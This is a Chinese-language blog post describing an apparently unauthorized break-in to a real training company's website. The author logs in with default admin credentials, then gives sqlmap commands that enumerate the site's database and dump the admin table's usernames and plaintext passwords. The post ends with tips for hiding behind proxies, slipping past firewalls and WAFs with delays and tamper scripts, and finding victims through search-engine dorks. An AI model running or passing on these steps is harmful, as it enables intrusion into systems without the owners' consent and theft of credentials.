一个管理培训网站,后台管理系统后面加个/admin就是,这么容易就找到了后台管理,果然容易黑。后台:

不过,后台管理UI有点丑。然后输入用户名/密码:admin/admin,就进去了。如下:

怎么搞de呢,首先我们使用一些扫描工具扫描可sql注入的站点(搜索关键字一般都是inurl:.php?这类)。记下你要攻击的站点,然后使用sqlmap:

1
sqlmap.py -u "http://[你的站点域名]/about.php?id=1*" --batch  //*表示由sqlmap自动扫描注入点  --batch表示由sqlmap默认选择提示。

结果:

可以看到:这网站使用mysql5.5以上版本,且存在布尔注入、报错注入、基于时间延迟注入和联合查询注入。神啊,天杀的程序员,代码写得贼jb6啊。

一步一步来,使用sqlmap:

1
sqlmap.py -u "http://[你的站点域名]/about.php?id=1*" --batch --current-db   //查看当前使用的数据库

结果:

数据库:sailodln_main,记住了。继续来:

1
sqlmap.py -u "http://[你的站点域名]/about.php?id=1*" --batch -D sailodln_main --tables   //查看当前数据库的所有表

结果:

一般管理员用户名密码可能在有admin字样的表中吧。

1
sqlmap.py -u "http://[你的站点域名]/about.php?id=1*" --batch -D sailodln_main -T v_admin --columns  //查看v_admin表的所有字段

结果:

把这两个字段的内容dump出excel:

1
sqlmap.py -u "http://[你的站点域名]/about.php?id=1*" --batch -D sailodln_main -T v_admin -C name,pwd --dump

结果:

OK,拿到管理员账户和密码,而且居然也还是明文保存的,这程序员可以拿来祭天了吧,应该。
接下里,人道主义:

最后,说说关于sqlmap,我的一些总结:

  1. 使用代理(一般使用蓝灯代理80-浏览器访问,高级设置里可看到本地代理地址,并勾选代理全部流量):

    1
    --proxy=(http|https|socks4|socks5)://address:port --proxy-cred=username:password
  2. 忽略https:

    1
    --force-ssl
  3. 使用多线程加快速度:

    1
    --threads=0~10
  4. 伪静态页面
    有些web服务器进行了url rewrite或者网站是伪静态的(.html),无法直接提供测试参数,这样子可以使用 \ 来代替要测试的参数。

  5. 请求延时
    在注入过程中请求太频繁的话可能会被防火墙拦截,这时候–delay参数就起作用了。可以设定两次HTTP请求间的延时。有的web程序会在多次错误访问后屏蔽所有请求,这样就导致之后所有的测试无法进行,绕过这个策略可以使用–safe-url,每隔一段时间去访问一个正常的页面。

  6. 使用google搜索
    sqlmap可以测试google搜索结果中的sql注入,很强大的功能吧。使用方法是参数-g。不过感觉实际使用中这个用的还是很少的。

  7. POST注入
    有两种方法来进行post注入,一种是使用–data参数,将post的key和value用类似GET方式来提交。二是使用-r参数,sqlmap读取用户抓到的POST请求包,来进行POST注入检测。

  8. 查看payload
    使用-v 3就可以显示注入的payload,4,5,6还可以显示HTTP请求,HTTP响应头和页面。

  9. Tamper
    如”space2morehash.py” ,调用脚本对payload进行伪装,可用于防止waf等拦截。

注:

  • 基于时间延时的注入使用多线程也没用,并且获取很慢
  • 重启电脑后,未完成的sessionsqlite将清除
  • 代理和线程一般是互斥的,一个代理一般允许一个线程作为用户去访问它,如蓝灯。